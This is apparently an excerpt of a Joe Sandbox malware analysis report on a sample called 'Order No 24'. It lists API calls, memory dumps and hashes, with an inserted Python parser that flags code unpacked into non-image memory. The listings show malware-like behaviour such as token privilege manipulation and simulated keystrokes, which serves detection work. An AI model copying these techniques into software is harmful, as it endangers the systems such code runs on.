                                                                                                                                   • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClearVariant
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1473721057-0
                                                                                                                                  • Opcode ID: 098a955ff4e62adec51f3334ea3a188c6b91556dc71d1971758a841a2a191489
                                                                                                                                  • Instruction ID: 449b496c2ce9f221b80d7eb6ef931ec0f521251f6b6c14600cfcaf51a3554813
                                                                                                                                  • Opcode Fuzzy Hash: 098a955ff4e62adec51f3334ea3a188c6b91556dc71d1971758a841a2a191489
                                                                                                                                  • Instruction Fuzzy Hash: 65210770508705CFDB24DF68C454B2ABBE1BF85304F25496CF6AA47261D732E845DF92
                                                                                                                                  APIs
                                                                                                                                  • ___lock_fhandle.LIBCMT ref: 009AAFC0
                                                                                                                                    • Part of subcall function 009A7BDA: __getptd_noexit.LIBCMT ref: 009A7BDA
                                                                                                                                    • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __getptd_noexit$___lock_fhandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1144279405-0
                                                                                                                                  • Opcode ID: 138849420ab40c7002096774c1cca8aed8f63b4012055bd65d43d1c721ca0470
                                                                                                                                  • Instruction ID: 1416ba2676e039ddb6d14690d611fb67a72c1769155897d5850a01f1d286e1e6
                                                                                                                                  • Opcode Fuzzy Hash: 138849420ab40c7002096774c1cca8aed8f63b4012055bd65d43d1c721ca0470
                                                                                                                                  • Instruction Fuzzy Hash: D1118F728096609FD712AFE49C4276E7A60AFC3335F2A4640E5741B2E7C7B98D019BE1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1029625771-0
                                                                                                                                  • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                                                                                  • Instruction ID: 97bb1f5fa7b8990f1fc47fd4411b2118181c940e9a992ef36d002df3215504d9
                                                                                                                                  • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                                                                                                  • Instruction Fuzzy Hash: 6201813150410EEECF04FFA4C892DFEBF78EF61304F008029B566972A5EA309A49CB60
                                                                                                                                  APIs
                                                                                                                                  • __lock_file.LIBCMT ref: 009A2AED
                                                                                                                                    • Part of subcall function 009A7C0E: __getptd_noexit.LIBCMT ref: 009A7C0E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __getptd_noexit__lock_file
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2597487223-0
                                                                                                                                  • Opcode ID: 5342c579f559c8b902ea2505968c60267e2ba4d91a4ef14a7fa65d228be69eff
                                                                                                                                  • Instruction ID: 683f05cd5c4958b11b1b54a2cfa1cbc40e7c01945942c8822ca17bfd8d4ee26a
                                                                                                                                  • Opcode Fuzzy Hash: 5342c579f559c8b902ea2505968c60267e2ba4d91a4ef14a7fa65d228be69eff
                                                                                                                                  • Instruction Fuzzy Hash: 6DF0F631500215EBDF21AFBC8C023DF36A5BF82324F198415F8149B1D1C7788A52DBD1
                                                                                                                                  APIs
                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,009839FE,?,00000001), ref: 00984286
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                  • Opcode ID: 4e5c692c4b78f89f7215f56fd0e2fe4045c172f3efd88fb7d3ea47ef84254f35
                                                                                                                                  • Instruction ID: c35d5cffda6a7858dbc43c1ce9e36baebbe12557c2ac5fd21ab19a3080725534
                                                                                                                                  • Opcode Fuzzy Hash: 4e5c692c4b78f89f7215f56fd0e2fe4045c172f3efd88fb7d3ea47ef84254f35
                                                                                                                                  • Instruction Fuzzy Hash: 6BF03971509702CFCB34AFA4D890816BBE8BF043293248A3EF1E786610C7329850DF50
                                                                                                                                  APIs
                                                                                                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009840C6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                   • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                   • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LongNamePath
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 82841172-0
                                                                                                                                  • Opcode ID: 237e109acf301925538f4d8c62d9de9f7f92f9d3577182ff8f3144af7b9aca69
                                                                                                                                  • Instruction ID: 064ef3e132ab4451a37510ae78d372431e9ed6fb93722687a8e6742aebdf8ff7
                                                                                                                                  • Opcode Fuzzy Hash: 237e109acf301925538f4d8c62d9de9f7f92f9d3577182ff8f3144af7b9aca69
                                                                                                                                  • Instruction Fuzzy Hash: F0E0C2376002285BC711E698CC46FEA77ADDFC87A0F0A01B5F909E7244DE64E9828690
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNELBASE(000001F4), ref: 01273BC1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141637301.0000000001271000.00000040.00000020.00020000.00000000.sdmp, Offset: 01271000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1271000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Sleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                  • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                  • Instruction ID: 74a2f411085f4513785176c5d0febbacfd77b2e8137392b7ef9f44e3b07ab0e0
                                                                                                                                  • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                  • Instruction Fuzzy Hash: F5E0BF7494010DEFDB00EFA4D5496EE7BB4FF04301F1005A1FD05D7681DB309E549A62
                                                                                                                                  APIs
                                                                                                                                  • Sleep.KERNELBASE(000001F4), ref: 01273BC1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141637301.0000000001271000.00000040.00000020.00020000.00000000.sdmp, Offset: 01271000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_1271000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Sleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                  • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                  • Instruction ID: fd00e606e6ed67e37ebfe03a6af86c03a4d2db7a971efadfc0b90bc67d0b1775
                                                                                                                                  • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                  • Instruction Fuzzy Hash: 5DE0E67494010DDFDB00EFB4D5496AE7FB4FF04301F100561FD01D2281D6309D509A62
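Added example, not part of the Joe Sandbox report or its IDA plugin: a small Python parser for function entries in this listing. It separates functions dumped from the mapped image at 00980000 from those, like the two Sleep entries above, dumped from a region the report marks "based on PE: false", and builds an index of API call sites (direct and via subcalls). It assumes that the 5th dot-separated field of the .sdmp name is the Windows page protection and the 7th the region type; that reading is taken from the names on this page, not from a documented format. The sample text is constructed from entries on this page, abbreviated.

```python
import re
from dataclasses import dataclass

# winnt.h constants used to decode the .sdmp file name. Reading the 5th
# dot-separated field as page protection and the 7th as region type is an
# assumption taken from the names on this page, not a documented Joe Sandbox format.
PAGE_PROTECTION = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                   0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# "• Name.MODULE(args), ref: ADDR", optionally prefixed by "Part of subcall function X:"
API_CALL = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)")
SOURCE = re.compile(r"Source File:\s*(?P<sdmp>\S+\.sdmp),\s*Offset:\s*(?P<off>[0-9A-F]+),"
                    r"\s*based on PE:\s*(?P<pe>true|false)")

@dataclass
class FunctionEntry:
    sdmp: str
    offset: int
    based_on_pe: bool
    calls: list          # (api, module, args, ref, subcall address or None)
    api_id: str = ""

    def _field(self, i):
        return int(self.sdmp.split(".")[i], 16)

    @property
    def protection(self):
        return PAGE_PROTECTION.get(self._field(4), f"0x{self._field(4):x}")

    @property
    def mem_type(self):
        return MEM_TYPE.get(self._field(6), f"0x{self._field(6):x}")

    @property
    def unpacked_code(self):
        # Executable memory with no PE image behind it is where an unpacked
        # stage or an injected payload normally lives.
        return not self.based_on_pe and self.protection.startswith("PAGE_EXECUTE")

def parse_entries(text):
    """One FunctionEntry per function: API lines precede the Memory Dump Source
    block, and the Instruction Fuzzy Hash line closes the entry."""
    entries, pending, cur = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if cur is None:
            m = API_CALL.match(line)
            if m:
                pending.append((m["name"], m["module"], m["args"] or "", m["ref"], m["sub"]))
                continue
            m = SOURCE.search(line)
            if m:
                cur = FunctionEntry(m["sdmp"], int(m["off"], 16), m["pe"] == "true", pending)
                pending = []
            continue
        if line.startswith("• API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
        elif line.startswith("• Instruction Fuzzy Hash:"):
            entries.append(cur)
            cur = None
    return entries

def unpacked_functions(entries):
    """Functions whose code was dumped from executable, non-image memory."""
    return [e for e in entries if e.unpacked_code]

def call_index(entries):
    """'Api.MODULE' -> sorted call sites, including those reached via subcalls."""
    index = {}
    for e in entries:
        for name, module, _args, ref, _sub in e.calls:
            index.setdefault(f"{name}.{module}", set()).add(ref)
    return {k: sorted(v) for k, v in index.items()}

# Constructed sample: two entries abbreviated from the listing on this page.
SAMPLE = """APIs
  • Part of subcall function 00984214: FreeLibrary.KERNEL32(00000000,?), ref: 00984247
• LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,009839FE,?,00000001), ref: 009841DB
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Library$Free$Load
• Instruction Fuzzy Hash: BC11A731604207BBDF10FB74DD06FAE77E99F80700F108829F5A6A62C1DA75DA059B61
APIs
• Sleep.KERNELBASE(000001F4), ref: 01273BC1
Memory Dump Source
• Source File: 00000000.00000002.2141637301.0000000001271000.00000040.00000020.00020000.00000000.sdmp, Offset: 01271000, based on PE: false
Similarity
• API ID: Sleep
• Instruction Fuzzy Hash: F5E0BF7494010DEFDB00EFA4D5496EE7BB4FF04301F1005A1FD05D7681DB309E549A62
"""

if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for e in unpacked_functions(parsed):
        print(f"{e.offset:08X} {e.api_id:<10} {e.protection} {e.mem_type}: not backed by a PE image")
```

Run against a full listing, the unpacked_functions output is the short list worth opening first in the dump, and call_index gives one place to look up every site that reaches a given API (for instance, the LoadLibraryExW call site at 009841DB with its FreeLibrary subcalls).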
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                                                                                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 009EF87D
                                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009EF8DC
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 009EF919
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009EF940
                                                                                                                                  • SendMessageW.USER32 ref: 009EF966
                                                                                                                                  • _wcsncpy.LIBCMT ref: 009EF9D2
                                                                                                                                  • GetKeyState.USER32(00000011), ref: 009EF9F3
                                                                                                                                  • GetKeyState.USER32(00000009), ref: 009EFA00
                                                                                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009EFA16
                                                                                                                                  • GetKeyState.USER32(00000010), ref: 009EFA20
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009EFA4F
                                                                                                                                  • SendMessageW.USER32 ref: 009EFA72
                                                                                                                                  • SendMessageW.USER32(?,00001030,?,009EE059), ref: 009EFB6F
                                                                                                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 009EFB85
                                                                                                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 009EFB96
                                                                                                                                  • SetCapture.USER32(?), ref: 009EFB9F
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 009EFC03
                                                                                                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 009EFC0F
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 009EFC29
                                                                                                                                  • ReleaseCapture.USER32 ref: 009EFC34
                                                                                                                                  • GetCursorPos.USER32(?), ref: 009EFC69
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 009EFC76
                                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 009EFCD8
                                                                                                                                  • SendMessageW.USER32 ref: 009EFD02
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 009EFD41
                                                                                                                                  • SendMessageW.USER32 ref: 009EFD6C
                                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 009EFD84
                                                                                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 009EFD8F
                                                                                                                                  • GetCursorPos.USER32(?), ref: 009EFDB0
                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 009EFDBD
                                                                                                                                  • GetParent.USER32(?), ref: 009EFDD9
                                                                                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 009EFE3F
                                                                                                                                  • SendMessageW.USER32 ref: 009EFE6F
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 009EFEC5
                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 009EFEF1
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 009EFF19
                                                                                                                                  • SendMessageW.USER32 ref: 009EFF3C
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 009EFF86
                                                                                                                                  • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 009EFFB6
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 009F004B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                                                  • String ID: @GUI_DRAGID$F
                                                                                                                                  • API String ID: 2516578528-4164748364
                                                                                                                                  • Opcode ID: 84a0720e687878b804e90c2b0c418b8349bc62d5660d99527164a5425d9b77a2
                                                                                                                                  • Instruction ID: 6031c6fcd36b17e975323f190b2ebc256231c0af7e234d5aa7e734052cb4e973
                                                                                                                                  • Opcode Fuzzy Hash: 84a0720e687878b804e90c2b0c418b8349bc62d5660d99527164a5425d9b77a2
                                                                                                                                  • Instruction Fuzzy Hash: 5432F075604384EFDB12CFA4C894B6ABBA8FF89344F144A2AF695C72A1D731DC42CB51
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 009EB1CD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: %d/%02d/%02d
                                                                                                                                  • API String ID: 3850602802-328681919
                                                                                                                                  • Opcode ID: 917d50dbaf5beae9c20024b0bfe34a5a9ff054aab172a0142b7986338076acc4
                                                                                                                                  • Instruction ID: d7cf4339e71c658a5ce6c9d2c2199e0bfde5bff523aa2342464dca1452f9ec24
                                                                                                                                  • Opcode Fuzzy Hash: 917d50dbaf5beae9c20024b0bfe34a5a9ff054aab172a0142b7986338076acc4
                                                                                                                                  • Instruction Fuzzy Hash: D412C071500248ABEB269FA6CC49FAF7BB8FF85320F104519F915DA2E1DB749D42CB11
                                                                                                                                  APIs
                                                                                                                                  • GetForegroundWindow.USER32(00000000,00000000), ref: 0099EB4A
                                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009F3AEA
                                                                                                                                  • IsIconic.USER32(000000FF), ref: 009F3AF3
                                                                                                                                  • ShowWindow.USER32(000000FF,00000009), ref: 009F3B00
                                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 009F3B0A
                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009F3B20
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 009F3B27
                                                                                                                                  • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 009F3B33
                                                                                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 009F3B44
                                                                                                                                  • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 009F3B4C
                                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 009F3B54
                                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 009F3B57
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 009F3B6C
                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 009F3B77
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 009F3B81
                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 009F3B86
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 009F3B8F
                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 009F3B94
                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 009F3B9E
                                                                                                                                  • keybd_event.USER32(00000012,00000000), ref: 009F3BA3
                                                                                                                                  • SetForegroundWindow.USER32(000000FF), ref: 009F3BA6
                                                                                                                                  • AttachThreadInput.USER32(000000FF,?,00000000), ref: 009F3BCD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                                  • API String ID: 4125248594-2988720461
                                                                                                                                  • Opcode ID: 66703ff2023ffad121d25210d689ecb4e9fdcaf7e55d035ff9a9de774c507bd4
                                                                                                                                  • Instruction ID: 7b3be6d1954baf5b3827b6788919fbffa80ab2cd1c9465b10b97ba4d2c7911c4
                                                                                                                                  • Opcode Fuzzy Hash: 66703ff2023ffad121d25210d689ecb4e9fdcaf7e55d035ff9a9de774c507bd4
                                                                                                                                  • Instruction Fuzzy Hash: 69314572A4021CBFEB215BE59C49F7F7E6CEB44B50F104015FB05EA1D1D6B59D029BA0
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009BB180
                                                                                                                                    • Part of subcall function 009BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009BB1AD
                                                                                                                                    • Part of subcall function 009BB134: GetLastError.KERNEL32 ref: 009BB1BA
                                                                                                                                  • _memset.LIBCMT ref: 009BAD08
                                                                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 009BAD5A
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 009BAD6B
                                                                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009BAD82
                                                                                                                                  • GetProcessWindowStation.USER32 ref: 009BAD9B
                                                                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 009BADA5
                                                                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 009BADBF
                                                                                                                                    • Part of subcall function 009BAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009BACC0), ref: 009BAB99
                                                                                                                                    • Part of subcall function 009BAB84: CloseHandle.KERNEL32(?,?,009BACC0), ref: 009BABAB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                  • String ID: $default$winsta0
                                                                                                                                  • API String ID: 2063423040-1027155976
                                                                                                                                  • Opcode ID: 1ed0f534e27334f2960fa6ca0c4459ef25f7eeae41244d302235c90248481b8f
                                                                                                                                  • Instruction ID: d6e06b7488773633147f30beea5a89bfd631881f76136157fc4d927f4f44d864
                                                                                                                                  • Opcode Fuzzy Hash: 1ed0f534e27334f2960fa6ca0c4459ef25f7eeae41244d302235c90248481b8f
